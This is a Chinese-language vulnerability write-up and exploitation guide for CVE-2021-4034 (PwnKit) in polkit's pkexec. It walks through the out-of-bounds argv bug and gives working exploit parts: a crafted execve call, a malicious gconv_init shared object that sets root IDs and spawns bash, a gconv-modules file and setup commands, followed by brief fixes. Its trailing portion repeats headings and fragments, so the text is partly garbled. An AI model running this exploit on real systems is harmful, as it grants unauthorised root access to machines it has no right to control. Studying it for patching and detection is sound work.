CVE-2021-4034 (PwnKit) 漏洞深入分析与利用指南<\/h1>

1. 漏洞概述<\/h2>
CVE-2021-4034 是 polkit 的 pkexec 组件中存在的一个本地权限提升漏洞，俗称 "PwnKit"。该漏洞允许低权限用户在默认配置下提升至 root 权限。<\/p>

2. 影响范围<\/h2>

影响 2021 年以前发行的所有 Linux 发行版<\/li>

所有安装了 polkit 且 pkexec 具有 SUID 权限的系统<\/li> <\/ul>

3. 漏洞原理分析<\/h2>

3.1 漏洞核心机制<\/h3>

漏洞利用流程可分为两个主要部分：<\/p>

设置恶意环境变量<\/li>

通过恶意环境变量执行任意命令<\/li> <\/ol>

3.2 关键代码分析<\/h3>

在 pkexec 源码中（https:\/\/gitlab.freedesktop.org\/polkit\/polkit\/-\/blob\/0.120\/src\/programs\/pkexec.c）：<\/p>

533 行<\/strong>：n<\/code> 被赋值为 1<\/li>

610 行<\/strong>：存在越界读取问题。当执行 pkexec 时不传参数，argv 数组只有默认的 0 下标，1 是不存在的<\/li> <\/ul> 3.3 内存布局理解<\/h3> 当执行一个程序时，内核会将参数、环境字符串和指针(argv 和 envp)复制到新程序堆栈的末尾，布局如下：<\/p> |-argv[0] | argv[1]...argv[argc] | envp[0] | envp[1]...envp[envc] V V V V V V "program" "-option" NULL "value" "PATH=name" NULL <\/code><\/pre> 由于 argv 和 envp 指针在内存中是连续的，argv[1] 实际上指向的是 envp[0]。通过给 argv[1] 赋值就能修改环境变量。<\/p> 3.4 关键函数调用<\/h3> 632 行<\/strong>：调用 g_find_program_in_path<\/code> 函数根据 glib 源码，此函数用于在 PATH 中搜索传参的绝对路径<\/li> 例如传参 "id"，返回 "\/usr\/bin\/id"<\/li> <\/ul> <\/li> 639 行<\/strong>：将返回值越界写入 argv[1]（即第一个环境变量）<\/li> <\/ul> 4. 漏洞利用详解<\/h2> 4.1 设置恶意环境变量<\/h3> 利用代码如下：<\/p> char<\/span> *<\/span>a_argv[] =<\/span> { NULL }; <\/span><\/span>char<\/span> *<\/span>a_envp[] =<\/span> { "test"<\/span>, "PATH=GCONV_PATH=."<\/span>, NULL }; <\/span><\/span>execve("\/usr\/bin\/pkexec"<\/span>, a_argv, a_envp); <\/span><\/span><\/code><\/pre>操作步骤：<\/p> 创建畸形目录：mkdir GCONV_PATH=.<\/code><\/li> 在目录中创建 test 文件<\/li> <\/ol> 4.2 为什么不能直接设置环境变量？<\/h3> Linux 的动态连接器 ld-linux-x86-64.so.2<\/code> 会在特权程序执行时清除敏感环境变量（如 LD_PRELOAD）。因此必须通过这种间接方式设置环境变量。<\/p> 测试示例：<\/p> 普通程序（无 SUID）：LD_PRELOAD=.\/hello.so id<\/code> → 成功输出<\/li> pkexec（有 SUID）：LD_PRELOAD=.\/hello.so pkexec<\/code> → 不生效<\/li> <\/ul> 4.3 通过环境变量执行命令<\/h3> 关键点：<\/p> 670 行<\/strong>：用 for<\/code> 遍历 environment_variables_to_save<\/code> 作 key，去环境变量中取值<\/li> 传递给 validate_environment_variable<\/code> 函数检测 shell 合法性<\/li> 通过此函数触发关键函数 g_printerr<\/code><\/li> <\/ul> 两种触发方式：<\/p> 设置环境变量 SHELL=test<\/code><\/li> 或设置 XAUTHORITY=..<\/code><\/li> <\/ol> 4.4 调用链分析<\/h3> g_printerr<\/code> 间接调用 iconv_open<\/code> 的调用链：<\/p> strdup_convert() <- glib\/gmessages.c:1126 g_convert_with_fallback() <- glib\/gmessages.c:676 g_convert() <- glib\/gconvert.c:972 open_converter() <- glib\/gconvert.c:876 g_iconv_open() <- glib\/gconvert.c:637 try_conversion() <- glib\/gconvert.c:260 iconv_open() <- glib\/gconvert.c:208 <\/code><\/pre> 4.5 GCONV_PATH 机制<\/h3> iconv_open<\/code> 会根据环境变量中的 GCONV_PATH<\/code> 目录下的 gconv-modules<\/code> 文件加载转换模块。<\/p> 示例 gconv-modules<\/code> 文件内容：<\/p> module LANYI\/\/ UTF-8\/\/ lanyi 1 <\/code><\/pre> 表示 UTF-8 转换到 LANYI 编码需要使用 lanyi.so<\/code>，数字 1 表示转换成本。<\/p> 4.6 恶意 SO 文件示例<\/h3> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> gconv<\/span>() { <\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> gconv_init<\/span>() { <\/span><\/span> setuid(0<\/span>); <\/span><\/span> seteuid(0<\/span>); <\/span><\/span> setgid(0<\/span>); <\/span><\/span> setegid(0<\/span>); <\/span><\/span> static<\/span> char<\/span> *<\/span>a_argv[] =<\/span> { "bash"<\/span>, NULL }; <\/span><\/span> static<\/span> char<\/span> *<\/span>a_envp[] =<\/span> { "PATH=\/bin:\/usr\/bin:\/sbin"<\/span>, NULL }; <\/span><\/span> execve("\/bin\/bash"<\/span>, a_argv, a_envp); <\/span><\/span> exit(0<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>编译命令：<\/p> gcc -o lanyi.so -shared -fPIC lanyi.c <\/span><\/span><\/code><\/pre>4.7 为什么选择 GCONV_PATH 而非 LD_PRELOAD？<\/h3> LD_PRELOAD<\/code> 的 so 文件加载是在程序执行前，而 pkexec 已经启动后再设置无效<\/li> PHP 中 LD_PRELOAD<\/code> 能利用是因为： PHP 设置了 LD_PRELOAD<\/code> 后，又 fork 了新进程（如使用 popen<\/code>）<\/li> 父进程的环境变量会被新进程继承<\/li> 因此需要 PHP 执行 mail<\/code> 等能 fork 新进程的函数才可利用<\/li> <\/ul> <\/li> <\/ul> 5. 漏洞复现步骤<\/h2> 准备恶意环境：<\/p> mkdir -p 'GCONV_PATH=.'<\/span> <\/span><\/span>touch 'GCONV_PATH=.\/test'<\/span> <\/span><\/span>chmod +x 'GCONV_PATH=.\/test'<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建 gconv-modules<\/code> 文件：<\/p> module LANYI\/\/ UTF-8\/\/ lanyi 1 <\/code><\/pre> <\/li> 编译并放置恶意 so 文件<\/p> <\/li> 执行利用代码<\/p> <\/li> <\/ol> 6. 修复方案<\/h2> 更新到 polkit 最新版本<\/li> 取消 pkexec 的 SUID 权限： chmod 0755<\/span> \/usr\/bin\/pkexec <\/span><\/span><\/code><\/pre><\/li> <\/ol> 7. 参考资源<\/h2> polkit 源码：https:\/\/gitlab.freedesktop.org\/polkit\/polkit\/<\/li> glib 源码分析<\/li> 先知社区相关技术文章<\/li> <\/ul> 8. 扩展思考<\/h2> 其他可能存在类似越界读写问题的 SUID 程序<\/li> Linux 环境变量安全机制的局限性<\/li> 特权程序的安全编程实践<\/li> <\/ol>

CVE-2021-4034 (PwnKit) 漏洞深入分析与利用指南<\/h1>

1. 漏洞概述<\/h2> CVE-2021-4034 是 polkit 的 pkexec 组件中存在的一个本地权限提升漏洞，俗称 "PwnKit"。该漏洞允许低权限用户在默认配置下提升至 root 权限。<\/p>

3. 漏洞原理分析<\/h2>

4. 漏洞利用详解<\/h2>

8. 扩展思考<\/h2> 其他可能存在类似越界读写问题的 SUID 程序<\/li> Linux 环境变量安全机制的局限性<\/li> 特权程序的安全编程实践<\/li> <\/ol>

1. 漏洞概述<\/h2>
CVE-2021-4034 是 polkit 的 pkexec 组件中存在的一个本地权限提升漏洞，俗称 "PwnKit"。该漏洞允许低权限用户在默认配置下提升至 root 权限。<\/p>

8. 扩展思考<\/h2>

其他可能存在类似越界读写问题的 SUID 程序<\/li>
Linux 环境变量安全机制的局限性<\/li>
特权程序的安全编程实践<\/li> <\/ol>